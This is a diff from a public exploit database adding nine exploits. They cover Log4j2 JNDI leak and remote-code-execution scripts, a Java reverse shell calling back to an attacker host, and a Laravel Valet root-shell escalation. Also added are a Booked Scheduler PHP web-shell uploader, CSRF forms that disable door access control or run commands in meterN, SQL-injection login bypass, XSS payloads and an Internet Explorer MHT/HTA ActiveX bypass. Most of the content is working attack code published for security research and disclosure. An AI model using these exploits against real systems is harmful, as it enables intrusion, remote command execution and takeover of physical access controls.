DB: 2021-12-15

9 changes to exploits/shellcodes

Laravel Valet 2.0.3 - Local Privilege Escalation (macOS)
Microsoft Internet Explorer / ActiveX Control - Security Bypass
Apache Log4j2 2.14.1 - Information Disclosure
Apache Log4j 2 - Remote Code Execution (RCE)
WordPress Plugin Typebot 1.4.3 - Stored Cross Site Scripting (XSS) (Authenticated)
Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated)
Zucchetti Axess CLOKI Access Control 1.64 - Cross Site Request Forgery (CSRF)
meterN v1.2.3 - Remote Code Execution (RCE) (Authenticated)
Online Thesis Archiving System 1.0 - SQLi Authentication Bypass

exploits/hardware/webapps/50595.txt

@@ -0,0 +1,101 @@
+# Exploit Title: Zucchetti Axess CLOKI Access Control 1.64 - Cross Site Request Forgery (CSRF)
+# Date: 13/12/2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.axesstmc.com/cloki/
+
+<!--
+
+Zucchetti Axess CLOKI Access Control 1.64 CSRF Disable Access Control
+
+
+Vendor: Zucchetti Axess S.p.A.
+Product web page: https://www.axesstmc.com
+Affected version: 1.64
+                  1.63
+                  1.54
+
+
+Summary: CLOKI is the pre-installed application on our terminals that
+provides simple to use access control management and attendance monitoring
+using any browser (IE, Chrome, Firefox, etc.). It is suited for anyone
+looking for a stand-alone Access Control and Attendance Monitoring system
+where the users' data is not frequently changed. Data management is simple
+and intuitive and no additional software is needed on the PC intend to use
+as WEB base. CLOKI for Access Control also allows configuration and monitoring
+of access at all company entrances (doors, gates, turnstiles etc). The Access
+Control manages any type of reader, entrance and access credential. Using an
+impartial selector it is possible to check that employees do not take company
+assets and allows registration of all accesses to the system and all operations
+that users carry out.
+
+Desc: The application interface allows users to perform certain actions via HTTP
+requests without performing any validity checks to verify the requests. These
+actions can be exploited to perform authentication detriment and account password
+change with administrative privileges if a logged-in user visits a malicious web
+site.
+
+Tested on: Start X3 (h02 build 4163)
+           Start X1 (g01 build 2804)
+           X1/X2/X3/X4/X7 Web Server
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2021-5689
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5689.php
+
+
+13.11.2021
+
+-->
+
+
+CSRF disable AC:
+----------------
+<html>
+  <body>
+    <form action="http://10.0.0.2:8081/redirect.cgi">
+      <input type="hidden" name="flagAccessControlChanged" value="true" />
+      <input type="hidden" name="RAct" value="5" />
+      <input type="hidden" name="EnR" value="1" />
+      <input type="hidden" name="ExR" value="1" />
+      <input type="hidden" name="DenyRTout" value="5" />
+      <input type="hidden" name="DenyR" value="0" />
+      <input type="hidden" name="IType" value="0" />
+      <input type="hidden" name="E485" value="on" />
+      <input type="hidden" name="GType" value="0" />
+      <input type="hidden" name="TOO" value="50" />
+      <input type="hidden" name="TOC" value="50" />
+      <input type="hidden" name="TOOE" value="100" />
+      <input type="hidden" name="TOCE" value="100" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+
+CSRF enable AC:
+---------------
+<html>
+  <body>
+    <form action="http://10.0.0.2:8081/redirect.cgi">
+      <input type="hidden" name="flagAccessControlChanged" value="true" />
+      <input type="hidden" name="ACtrl" value="on" />
+      <input type="hidden" name="RAct" value="5" />
+      <input type="hidden" name="EnR" value="1" />
+      <input type="hidden" name="ExR" value="1" />
+      <input type="hidden" name="DenyRTout" value="5" />
+      <input type="hidden" name="DenyR" value="0" />
+      <input type="hidden" name="IType" value="0" />
+      <input type="hidden" name="E485" value="on" />
+      <input type="hidden" name="GType" value="0" />
+      <input type="hidden" name="TOO" value="50" />
+      <input type="hidden" name="TOC" value="50" />
+      <input type="hidden" name="TOOE" value="100" />
+      <input type="hidden" name="TOCE" value="100" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>

exploits/java/remote/50590.py

@@ -0,0 +1,97 @@
+# Exploit Title: Apache Log4j2 2.14.1 - Information Disclosure
+# Date: 12/12/2021
+# Exploit Author: leonjza
+# Vendor Homepage: https://logging.apache.org/log4j/2.x/
+# Version: <= 2.14.1
+# CVE: CVE-2021-44228
+
+#!/usr/bin/env python3
+
+# Pure python ENV variable leak PoC for CVE-2021-44228
+# Original PoC: https://twitter.com/Black2Fan/status/1470281005038817284
+#
+# 2021 @leonjza
+
+import argparse
+import socketserver
+import threading
+import time
+
+import requests
+
+LDAP_HEADER = b'\x30\x0c\x02\x01\x01\x61\x07\x0a\x01\x00\x04\x00\x04\x00\x0a'
+
+
+class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
+    def handle(self) -> None:
+        print(f' i| new connection from {self.client_address[0]}')
+
+        sock = self.request
+        sock.recv(1024)
+        sock.sendall(LDAP_HEADER)
+
+        data = sock.recv(1024)
+        data = data[9:]  # strip header
+
+        # example response
+        #
+        # ('Java version 11.0.13\n'
+        #  '\x01\x00\n'
+        #  '\x01\x03\x02\x01\x00\x02\x01\x00\x01\x01\x00\x0b'
+        #  'objectClass0\x00\x1b0\x19\x04\x172.16.840.1.113730.3.4.2')
+
+        data = data.decode(errors='ignore').split('\n')[0]
+        print(f' v| extracted value: {data}')
+
+
+class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
+    pass
+
+
+def main():
+    parser = argparse.ArgumentParser(description='a simple log4j
+<=2.14 information disclosure poc '
+                                                 '(ref:
+https://twitter.com/Black2Fan/status/1470281005038817284)')
+    parser.add_argument('--target', '-t', required=True, help='target uri')
+    parser.add_argument('--listen-host', default='0.0.0.0',
+                        help='exploit server host to listen on
+(default: 127.0.0.1)')
+    parser.add_argument('--listen-port', '-lp', default=8888,
+help='exploit server port to listen on (default: 8888)')
+    parser.add_argument('--exploit-host', '-eh', required=True,
+default='127.0.0.1',
+                        help='host where (this) exploit server is reachable')
+    parser.add_argument('--leak', '-l', default='${java:version}',
+                        help='value to leak. '
+                             'see:
+https://twitter.com/Rayhan0x01/status/1469571563674505217 '
+                             '(default: ${java:version})')
+    args = parser.parse_args()
+
+    print(f' i| starting server on {args.listen_host}:{args.listen_port}')
+    server = ThreadedTCPServer((args.listen_host, args.listen_port),
+ThreadedTCPRequestHandler)
+
+    serv_thread = threading.Thread(target=server.serve_forever)
+    serv_thread.daemon = True
+    serv_thread.start()
+    time.sleep(1)
+    print(f' i| server started')
+
+    payload = f'${{jndi:ldap://{args.exploit_host}:{args.listen_port}/{args.leak}}}'
+    print(f' i| sending exploit payload {payload} to {args.target}')
+
+    try:
+        r = requests.get(args.target, headers={'User-Agent': payload})
+        print(f' i| response status code: {r.status_code}')
+        print(f' i| response: {r.text}')
+    except Exception as e:
+        print(f' e| failed to make request: {e}')
+    finally:
+        server.shutdown()
+        server.server_close()
+
+
+if __name__ == '__main__':
+    main()

exploits/java/remote/50592.py

@@ -0,0 +1,81 @@
+# Exploit Title: Apache Log4j 2 - Remote Code Execution (RCE)
+# Date: 11/12/2021
+# Exploit Authors: kozmer, z9fr, svmorris
+# Vendor Homepage: https://logging.apache.org/log4j/2.x/
+# Software Link: https://github.com/apache/logging-log4j2
+# Version: versions 2.0-beta-9 and 2.14.1.
+# Tested on: Linux
+# CVE: CVE-2021-44228
+# Github repo: https://github.com/kozmer/log4j-shell-poc
+
+import subprocess
+import os
+import sys
+
+javaver = subprocess.call(['./jdk1.8.0_20/bin/java', '-version']) #stderr=subprocess.DEVNULL, stdout=subprocess.DEVNULL)
+print("\n")
+
+userip = input("[+] Enter IP for LDAPRefServer & Shell: ")
+userport = input("[+] Enter listener port for LDAPRefServer: ")
+lport = input("[+] Set listener port for shell: ")
+
+def payload():
+
+    javapayload = ("""
+
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.net.Socket;
+
+public class Exploit {
+
+  public Exploit() throws Exception {
+    String host="%s";
+    int port=%s;
+    String cmd="/bin/sh";
+    Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
+    Socket s=new Socket(host,port);
+    InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
+    OutputStream po=p.getOutputStream(),so=s.getOutputStream();
+    while(!s.isClosed()) {
+      while(pi.available()>0)
+        so.write(pi.read());
+      while(pe.available()>0)
+        so.write(pe.read());
+      while(si.available()>0)
+        po.write(si.read());
+      so.flush();
+      po.flush();
+      Thread.sleep(50);
+      try {
+        p.exitValue();
+        break;
+      }
+      catch (Exception e){
+      }
+    };
+    p.destroy();
+    s.close();
+  }
+}
+
+""") % (userip,lport)
+
+    f = open("Exploit.java", "w")
+    f.write(javapayload)
+    f.close()
+
+    os.system('./jdk1.8.0_20/bin/javac Exploit.java')
+
+    sendme = ("${jndi:ldap://%s:1389/a}") % (userip)
+    print("[+] Send me: "+sendme+"\n")
+
+def marshalsec():
+    os.system("./jdk1.8.0_20/bin/java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer
+http://{}:{}/#Exploit".format
+(userip, userport))
+
+if __name__== "__main__":
+    payload()
+    marshalsec()

exploits/macos/local/50591.py

@@ -0,0 +1,159 @@
+# Exploit Title: Laravel Valet 2.0.3 - Local Privilege Escalation (macOS)
+# Exploit Author: leonjza
+# Vendor Homepage: https://laravel.com/docs/8.x/valet
+# Version: v1.1.4 to v2.0.3
+
+#!/usr/bin/env python2
+
+# Laravel Valet v1.1.4 - 2.0.3 Local Privilege Escalation (macOS)
+# February 2017 - @leonjza
+
+# Affected versions: At least since ~v1.1.4 to v2.0.3. Yikes.
+# Reintroduced in v2.0.7 via the 'trust' command again.
+
+# This bug got introduced when the sudoers files got added around
+# commit b22c60dacab55ffe2dc4585bc88cd58623ec1f40 [1].
+
+# Effectively, when the valet command is installed, composer will symlink [2]
+# the `valet` command to /usr/local/bin. This 'command' is writable by the user
+# that installed it.
+#
+# ~ $ ls -lah $(which valet)
+# lrwxr-xr-x  1 leonjza  admin    51B Feb 25 00:09 /usr/local/bin/valet -> /Users/leonjza/.composer/vendor/laravel/valet/valet
+
+# Running `valet install`, will start the install [3] routine. The very first action
+# taken is to stop nginx (quietly?) [4], but runs the command with `sudo` which
+# will prompt the user for the sudo password in the command line. From here (and in fact
+# from any point where the valet tool uses sudo) the command can execute further commands
+# as root without any further interaction needed by the user.
+# With this 'sudo' access, the installer does it thing, and eventually installs two new
+# sudoers rules for homebrew[5] and valet[6].
+
+# ~ $ cat /etc/sudoers.d/*
+# Cmnd_Alias BREW = /usr/local/bin/brew *
+# %admin ALL=(root) NOPASSWD: BREW
+# Cmnd_Alias VALET = /usr/local/bin/valet *
+# %admin ALL=(root) NOPASSWD: VALET
+
+# The problem with the sudoers rules now is the fact that a user controlled script
+# (rememeber the valet command is writable to my user?) is allowed to be run with
+# root privileges. More conveniently, without a password. So, to trivially privesc
+# using this flaw, simply edit the `valet` command and drop `/bin/bash` in there. :D
+
+# Or, use this lame script you lazy sod.
+#
+# ~ $ sudo -k
+# ~ $ python escalate.py
+# * Shell written. Dropping into root shell
+# bash-3.2# whoami
+# root
+# bash-3.2# exit
+# exit
+# * Cleaning up POC from valet command
+
+# [1] https://github.com/laravel/valet/commit/b22c60dacab55ffe2dc4585bc88cd58623ec1f40
+# [2] https://github.com/laravel/valet/blob/v2.0.3/composer.json#L39
+# [3] https://github.com/laravel/valet/blob/v2.0.3/cli/valet.php#L37-L50
+# [4] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Nginx.php#L133
+# [5] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Brew.php#L171-L177
+# [6] https://github.com/laravel/valet/blob/v2.0.3/cli/Valet/Valet.php#L40-L46
+
+import os
+import subprocess
+
+MIN_VERSION = "1.1.4"
+MAX_VERSION = "2.0.3"
+POC = "/bin/bash; exit;\n"
+
+
+def run_shit_get_output(shit_to_run):
+    return subprocess.Popen(shit_to_run, shell=True,
+                            stderr=subprocess.PIPE, stdout=subprocess.PIPE)
+
+
+def version_tuple(v):
+    return tuple(map(int, (v.split("."))))
+
+
+def get_valet():
+    p = run_shit_get_output('which valet')
+    lines = ''.join(p.stdout.readlines())
+
+    if 'bin/valet' in lines:
+        return lines.strip()
+
+    return None
+
+
+def get_valet_version(valet_location):
+    p = run_shit_get_output(valet_location)
+    v = p.stdout.read(25)
+
+    return v.split("\n")[0].split(" ")[2]
+
+
+def can_write_to_valet(valet_location):
+    return os.access(valet_location, os.W_OK)
+
+
+def cleanup_poc_from_command(command_location):
+    with open(command_location, 'r') as vc:
+        command_contents = vc.readlines()
+
+    if command_contents[1] == POC:
+        print('* Cleaning up POC from valet command')
+        command_contents.pop(1)
+        with open(command_location, 'w') as vc:
+            vc.write(''.join(command_contents))
+
+        return
+
+    print('* Could not cleanup the valet command. Check it out manually!')
+    return
+
+
+def main():
+    valet_command = get_valet()
+
+    if not valet_command:
+        print(' * The valet command could not be found. Bailing!')
+        return
+
+    # get the content so we can check if we already pwnd it
+    with open(valet_command, 'r') as vc:
+        command_contents = vc.readlines()
+
+    # check that we havent already popped this thing
+    if command_contents[1] == POC:
+        print('* Looks like you already pwnd this. Dropping into shell anyways.')
+        os.system('sudo ' + valet_command)
+        cleanup_poc_from_command(valet_command)
+        return
+
+    current_version = get_valet_version(valet_command)
+
+    # ensure we have a valid, exploitable version
+    if not (version_tuple(current_version) >= version_tuple(MIN_VERSION)) \
+            or not (version_tuple(current_version) <= version_tuple(MAX_VERSION)):
+        print(' * Valet version {0} does not have this bug!'.format(current_version))
+        return
+
+    # check that we can write
+    if not can_write_to_valet(valet_command):
+        print('* Cant write to valet command at {0}. Bailing!'.format(valet_command))
+        return
+
+    # drop the poc line and write the new one
+    command_contents.insert(1, POC)
+    with open(valet_command, 'w') as vc:
+        vc.write(''.join(command_contents))
+
+    print('* Shell written. Dropping into root shell')
+
+    # drop in the root shell :D
+    os.system('sudo ' + valet_command)
+    cleanup_poc_from_command(valet_command)
+
+
+if __name__ == '__main__':
+    main()

exploits/php/webapps/50593.txt

@@ -0,0 +1,20 @@
+# Exploit Title: WordPress Plugin Typebot 1.4.3 - Stored Cross Site Scripting (XSS) (Authenticated)
+# Date: 29/11/2021
+# Exploit Author: Mansi Singh
+# Vendor Homepage: https://wordpress.org/plugins/typebot/
+# Software Link: https://wordpress.org/plugins/typebot/
+# Tested on Windows
+# Reference: https://wpscan.com/vulnerability/2bde2030-2dfe-4dd3-afc1-36f7031a91ea
+
+How to reproduce vulnerability:
+
+1. Install Latest WordPress
+
+2. Install and activate Typebot Version 1.4.3
+
+3. Navigate to Typebot setting >> enter the payload into 'Publish ID or Full URL'.
+
+4. Enter JavaScript payload which is mentioned below
+"><img src=x onerror=confirm(1)>
+
+5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload gets executed successfully and we'll get a pop-up.

exploits/php/webapps/50594.py

@@ -0,0 +1,116 @@
+# Exploit Title: Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated)
+# Vulnerability founder: AkkuS
+# Date: 13/12/2021
+# Exploit Author: 0sunday
+# Vendor Homepage: https://www.bookedscheduler.com/
+# Software Link: N/A
+# Version: Booked Scheduler 2.7.5
+# Tester on: Kali 2021.2
+# CVE: CVE-2019-9581
+
+#!/usr/bin/python3
+
+import sys
+import requests
+from random import randint
+
+
+def login():
+	login_payload = {
+		"email": username,
+		"password": password,
+		"login": "submit",
+		#"language": "en_us"
+	}
+
+	login_req = request.post(
+		 target+"/booked/Web/index.php",
+		 login_payload,
+		 verify=False,
+		 allow_redirects=True
+	 )
+
+	if login_req.status_code == 200:
+		print ("[+] Logged in successfully.")
+	else:
+		print ("[-] Wrong credentials !")
+		exit()
+
+
+	return login_req.text.split('CSRF_TOKEN" value=')[1].split(";")[0].split('/')[0].split('"')[1]
+
+
+
+def upload_shell(csrf):
+
+	boundary = str(randint(123456789012345678901234567890, 999999999999999999999999999999))
+
+	_headers ={ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
+				"Accept-Language": "en-US,en;q=0.5",
+				"X-Requested-With": "XMLHttpRequest",
+				"Content-Type": "multipart/form-data; boundary=---------------------------"+boundary,
+				"Origin": target,
+				"Connection": "close",
+				"Referer": target + "/booked/Web/admin/manage_theme.php?update"
+
+				}
+
+	data =  "-----------------------------"+boundary+"\r\n"
+	data += "Content-Disposition: form-data; name=\"LOGO_FILE\"\r\n\n\n"
+	data += "-----------------------------"+boundary+"\r\n"
+	data += "Content-Disposition: form-data; name=\"FAVICON_FILE\"; filename=\"simple_shell.php\"\r\n"
+	data += "Content-Type: application/x-php\r\n\n"
+	data += "<?php $o = system($_REQUEST[\"cmd\"]);die?>\r\n\n"
+	data += "-----------------------------"+boundary+"\r\n"
+	data += "Content-Disposition: form-data; name=\"CSS_FILE\"\r\n\n\n"
+	data += "-----------------------------"+boundary+"\r\n"
+	data += "Content-Disposition: form-data; name=\"CSRF_TOKEN\"\r\n\n"
+	data += csrf + "\r\n"
+	data += "-----------------------------"+boundary+"--\r\n"
+
+	# In case you need some debugging
+	_proxies = {
+		'http': 'http://127.0.0.1:8080'
+	}
+
+	upload_req = request.post(
+		 target+"/booked/Web/admin/manage_theme.php?action=update",
+		 headers = _headers,
+		 data = data
+		 #proxies=_proxies
+		 )
+
+
+def shell():
+	shell_req = request.get(target+"/booked/Web/custom-favicon.php")
+
+	if shell_req.status_code == 200:
+
+		print("[+] Uploaded shell successfully")
+		print("[+] " + target + "/booked/Web/custom-favicon.php?cmd=")
+	else:
+		print("[-] Shell uploading failed")
+		exit(1)
+
+	print()
+	cmd = ''
+	while(cmd != 'exit'):
+		cmd = input("$ ")
+		shell_req = request.get(target+"/booked/Web/custom-favicon.php" + '?cmd='+cmd)
+		print(shell_req.text)
+
+
+if len(sys.argv) != 4:
+    print ("[+] Usage : "+ sys.argv[0] + " https://target:port username password")
+    exit()
+
+target = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+
+
+request = requests.session()
+
+csrf = login()
+upload_shell(csrf)
+shell()

exploits/php/webapps/50596.txt

@@ -0,0 +1,121 @@
+# Exploit Title: meterN v1.2.3 - Remote Code Execution (RCE) (Authenticated)
+# Date: 18/11/2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.metern.org
+
+<!--
+
+meterN v1.2.3 Authenticated Remote Command Execution Vulnerability
+
+
+Vendor: Jean-Marc Louviaux
+Product web page: https://www.metern.org
+Affected version: 1.2.3 and 0.8.3.2
+
+
+Summary: meterN is a set of PHP/JS files that make a -Home energy metering & monitoring- solution.
+It accept any meters like : electrical, water, gas, fuel consumption, solar, Wind energy production
+and so on. Sensors such as temperature or humidity are also accepted. The philosophy is: To keep it
+simple, fast, with a low foot print to run on cheap and low powered devices.
+
+Desc: The application suffers from an authenticated OS command execution vulnerability. This can be
+exploited to execute arbitrary commands through the 'COMMANDx' and 'LIVECOMMANDx' POST parameters in
+admin_meter2.php and admin_indicator2.php scripts. The application interface allows users to perform
+these actions through HTTP requests without performing any validity checks to verify the requests.
+This CSRF can be exploited to perform actions with administrative privileges if a logged-in user
+visits a malicious web site.
+
+---------------------------------------------------------------------------------------------------
+/admin/admin_meter2.php:
+------------------------
+
+69: if (!empty($_POST['COMMANDx']) && is_string($_POST['COMMANDx'])) {
+70:     $COMMANDx = htmlspecialchars($_POST['COMMANDx'], ENT_QUOTES, 'UTF-8');
+71: } else {
+72:     $COMMANDx = '';
+73: }
+...
+...
+108: if (!empty($_POST['LIVECOMMANDx']) && is_string($_POST['LIVECOMMANDx'])) {
+109:     $LIVECOMMANDx = htmlspecialchars($_POST['LIVECOMMANDx'], ENT_QUOTES, 'UTF-8');
+110: } else {
+111:     $LIVECOMMANDx = '';
+112: }
+...
+...
+271: exec("$COMMANDx 2>&1", $datareturn);
+...
+...
+303: exec("$LIVECOMMANDx 2>&1", $datareturn);
+
+---------------------------------------------------------------------------------------------------
+
+Tested on: Apache/2.4.10 (Raspbian)
+           Apache/2.4.46 (Win64)
+           Linux 4.9.67-v7+ GNU/Linux (armv7l)
+           Microsoft Windows 10 Home (10.0.19042 Build 19042)
+           PHP/7.2.33
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2021-5690
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5690.php
+
+
+18.11.2021
+
+-->
+
+
+PoC #1:
+-------
+
+<html>
+  <body>
+    <form action="http://localhost/metern/admin/admin_indicator2.php" method="POST">
+      <input type="hidden" name="NUMINDx" value="1" />
+      <input type="hidden" name="INDNAMEx1" value="test" />
+      <input type="hidden" name="IDx1" value="1" />
+      <input type="hidden" name="COMMANDx1" value="calc" />
+      <input type="hidden" name="bntsubmit1" value="Test&#32;command" />
+      <input type="hidden" name="UNITx1" value="" />
+      <input type="submit" value="Incongruity" />
+    </form>
+  </body>
+</html>
+
+
+PoC #2:
+-------
+
+<html>
+  <body>
+    <form action="http://localhost/metern/admin/admin_meter2.php" method="POST">
+      <input type="hidden" name="METNAMEx" value="Conso" />
+      <input type="hidden" name="COLORx" value="962629" />
+      <input type="hidden" name="TYPEx" value="Elect" />
+      <input type="hidden" name="PRODx" value="2" />
+      <input type="hidden" name="PHASEx" value="1" />
+      <input type="hidden" name="SKIPMONITORINGx" value="" />
+      <input type="hidden" name="IDx" value="elect" />
+      <input type="hidden" name="COMMANDx" value="houseenergy&#32;&#45;energy" />
+      <input type="hidden" name="PASSOx" value="100000" />
+      <input type="hidden" name="PRICEx" value="0&#46;23" />
+      <input type="hidden" name="LIDx" value="elect" />
+      <input type="hidden" name="LIVECOMMANDx" value="calc" />
+      <input type="hidden" name="bntsubmit" value="Test&#32;live&#32;command" />
+      <input type="hidden" name="EMAILx" value="" />
+      <input type="hidden" name="WARNCONSODx" value="15000" />
+      <input type="hidden" name="NORESPMx" value="true" />
+      <input type="hidden" name="POAKEYx" value="" />
+      <input type="hidden" name="POUKEYx" value="" />
+      <input type="hidden" name="TLGRTOKx" value="" />
+      <input type="hidden" name="TLGRCIDx" value="" />
+      <input type="hidden" name="met&#95;numx" value="1" />
+      <input type="submit" value="Incongruity" />
+    </form>
+  </body>
+</html>

exploits/php/webapps/50597.txt

@@ -0,0 +1,38 @@
+# Exploit Title: Online Thesis Archiving System 1.0 - SQLi Authentication Bypass
+# Exploit Author: Yehia Elghaly (YME)
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html
+# Version: Online Thesis Archiving System 1.0
+# Tested on: Windows, xampp
+# CVE: N/A
+
+- Description:SQLi Authentication Bypass
+SQL Injection vulnerability exists in Online Thesis Archiving System 1.0 1.0. An admin account takeover exists with the payload: admin' # -  admin' or '1'='1
+
+PoC:
+
+POST /otas/admin/login.php HTTP/1.1
+Host: 192.168.113.130
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 35
+Origin: http://192.168.113.130
+DNT: 1
+Connection: close
+Referer: http://192.168.113.130/otas/admin/login.php
+Cookie: PHPSESSID=0jsudph494kpt2a5jvbvdvsrsc
+Upgrade-Insecure-Requests: 1
+
+username=admin' #&password=admin' #
+
+- Description: Stored Cross Site Scripting (XSS)
+Stored Cross Site Scripting (XSS) exists in Online Thesis Archiving System 1.0.
+
+Steps:
+
+1- Go to (http://localhost/otas/admin/?page=departments) and (http://localhost/otas/admin/?page=curriculum)
+2- Add new (curriculum) or (department)
+3- Insert your payload <script>("xssyf")</script>

exploits/windows/local/50598.txt

@@ -0,0 +1,162 @@
+# Exploit Title: Microsoft Internet Explorer / ActiveX Control - Security Bypass
+# Exploit Author: John Page (aka hyp3rlinx)
+# Website: hyp3rlinx.altervista.org
+# Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-ACTIVEX-CONTROL-SECURITY-BYPASS.txt
+# twitter.com/hyp3rlinx
+# ISR: ApparitionSec
+
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Microsoft Internet Explorer (MSIE)
+Internet Explorer is a discontinued series of graphical web browsers
+developed by Microsoft and included in the Microsoft Windows line of
+operating systems, starting in 1995.
+
+
+[Vulnerability Type]
+ActiveX Control Security Bypass
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+Upon opening a specially crafted .MHT file on disk, Internet Explorer
+ActiveX control warnings as well as popup blocker privacy settings are
+not enforced.
+This can allow the execution of ActiveX content with zero warning to
+an unsuspecting end user and or force them to visit arbitrary attacker
+controlled websites.
+
+By default when opening browser associated files that contain active
+content, MSIE restricts scripts from running without explicit user
+interaction and permission.
+Instead end users are presented with a yellow warning bar on the
+browsers webpage, asking first if they wish to allow the running of
+blocked content.
+This prevents execution of active content scripts or controls without
+the user first clicking the "Allow blocked content" warning bar.
+
+However, specially crafted MHT files residing on disk that contain an
+invalid header directive suppress ActiveX warnings and Popup blocker
+privacy settings.
+Therefore, to bypass Internet Explorer "active content" blocking,
+files needs to contain an Content-Location header using an arbitrary
+named value E.g.
+
+"Content-Location: PBARBAR"
+
+Note, often times MHT files are set to open in IE by default and IE
+while discontinued it is still present on the Windows OS.
+Tested successfully on Windows 10 latest fully patched version with
+default IE security settings.
+
+Expected result: ActiveX control security warning, prevention of code
+execution and blocking browser popup windows.
+Actual result: No ActiveX control code execution blocking, security
+warnings or browser window popup blocking enforcement.
+
+[PoC Requirements]
+MHT file must reside on disk, think targeted attack scenarios.
+
+[Exploit/POC]
+Change [VICTIM] value below to a specified user for testing.
+
+1) Create the MHT PoC file.
+
+"MSIE_ActiveX_Control_Security_Bypass.mht"
+
+From:
+Subject:
+Date:
+MIME-Version: 1.0
+Content-Type: multipart/related; type="text/html";
+boundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001"
+This is a multi-part message in MIME format.
+
+
+--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001
+Content-Type: text/html; charset="UTF-8"
+Content-Location: DOOM
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
+"http://www.w3.org/TR/html4/transitional.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
+</head>
+<body>
+
+
+<script>
+win=window
+win.open("http://www.microsoft.com","","width=600,height=600")
+var args = ['height='+1,'width='+1,].join(',')
+setTimeout("", 3000)
+var pop = win.open('c:/Users/[VICTIM]/Desktop/Sales_Report_2021.csv
+________________________________________________________.hta', 'pop',
+args)
+pop.moveTo(2000,2000)
+</script>
+
+
+</body>
+</html>
+
+
+--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001--
+
+
+2) Create the PoC HTA file.
+
+"Sales_Report_2021.csv
+________________________________________________________.hta"
+
+<HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no"
+SYSMENU="no"  CAPTION="no" />
+<script language="VBScript">
+Set WshShell = CreateObject("WScript.Shell")
+WshShell.Run("calc.exe")
+</script>
+
+
+3) Open the MHT file locally.
+
+
+[Network Access]
+Local
+
+
+[POC/Video URL]
+https://www.youtube.com/watch?v=UCSqFbYUvBk
+
+
+[Disclosure Timeline]
+Vendor Notification:  May 13, 2019
+MSRC : July 2, 2019
+"We determined that a fix for this issue will be considered in a
+future version of this product or service.
+At this time, we will not be providing ongoing updates of the status
+of the fix for this issue, and we have closed this case."
+December 5, 2021 : Public Disclosure
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is"
+with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion
+in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse
+of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The
+author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

files_exploits.csv

@@ -11424,6 +11424,8 @@ id,file,description,date,author,type,platform,port
 50558,exploits/windows/local/50558.txt,"MilleGPG5 5.7.2 Luglio 2021 - Local Privilege Escalation",1970-01-01,"Alessandro Salzano",local,windows,
 50566,exploits/windows/local/50566.txt,"HCL Lotus Notes V12 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows,
 50574,exploits/windows/local/50574.txt,"MTPutty 1.0.1.21 - SSH Password Disclosure",1970-01-01,"Sedat Ozdemir",local,windows,
+50591,exploits/macos/local/50591.py,"Laravel Valet 2.0.3 - Local Privilege Escalation (macOS)",1970-01-01,leonjza,local,macos,
+50598,exploits/windows/local/50598.txt,"Microsoft Internet Explorer / ActiveX Control - Security Bypass",1970-01-01,hyp3rlinx,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -18579,6 +18581,8 @@ id,file,description,date,author,type,platform,port
 50569,exploits/hardware/remote/50569.txt,"Auerswald COMpact 8.0B - Multiple Backdoors",1970-01-01,"RedTeam Pentesting GmbH",remote,hardware,
